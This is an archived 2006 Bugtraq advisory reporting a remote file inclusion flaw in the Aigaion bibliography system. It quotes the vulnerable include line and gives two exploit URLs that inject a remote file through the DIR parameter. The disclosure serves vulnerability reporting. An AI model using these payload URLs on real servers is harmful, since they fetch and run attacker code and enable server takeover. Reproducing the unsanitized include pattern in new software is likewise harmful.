Nmap Security Scanner
*Intro
*Ref Guide
*Install Guide
*Download
*Changelog
*Book
*Docs
Security Lists
*Nmap Hackers
*Nmap Dev
*Bugtraq
*Full Disclosure
*Pen Test
*Basics
*More
Security Tools
*Pass crackers
*Sniffers
*Vuln Scanners
*Web scanners
*Wireless
*Exploitation
*Packet crafters
*More
Site News
Site Search:
Exploit World
Advertising
About/Contact
Credits
Sponsors:

bugtraq logo Bugtraq mailing list archives

Web Interface remote file inclusion
From: navairum () gmail com
Date: 12 Nov 2006 00:45:24 -0000
Software:Web based bibliography management system
Download link: http://sourceforge.net/projects/aigaion/
script:_basicfunctions.php
author: navairum

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
The script _basicfunctions.php does not specify a value for the $DIR variable before including it.
Vulnerable code:

//if this script is not called from within one of the base pages, redirect to frontpage
require_once($DIR."checkBase.php"); 

/* This function leads the browser to the given location */

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Exploit:
http://site/[PATH]/_basicfunctions.php?DIR=http://site/uhoh.txt?
http://site/path/pageactionauthor.php?DIR=http://site/uhoh.txt?

------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

peace

  By Date           By Thread  

Current thread:
  • Web Interface remote file inclusion navairum (Nov 13)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]